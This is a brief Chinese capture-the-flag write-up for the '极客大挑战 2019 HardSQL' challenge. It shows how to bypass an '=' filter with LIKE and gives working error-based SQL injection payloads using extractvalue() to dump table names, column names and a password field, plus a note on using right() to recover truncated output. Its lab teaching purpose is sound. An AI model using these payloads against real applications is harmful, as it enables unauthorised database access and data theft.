[极客大挑战 2019]HardSQL

  • 首先拿到题目,使用 ' 进行尝试,发现输出了错误信息,直接使用报错注入的方式尝试

  • 在尝试的过程中发现过滤了=,这里我们可以使用like进行替换,然后就是正常的报错注入流程了

    1. 爆名

      admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))#
      
    2. 爆字段

      admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))#
      
    3. 查数据

      admin'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)))))#
      

这里最关键的点来了,我们爆出来的是部分flag

extractvalue和updatexml只显示32围字符

所以我们需要使用right()函数爆出右边的部分flag

上一篇:Go语言切片一网打尽,别和Java语法傻傻分不清楚


下一篇:Go语言的面向对象编程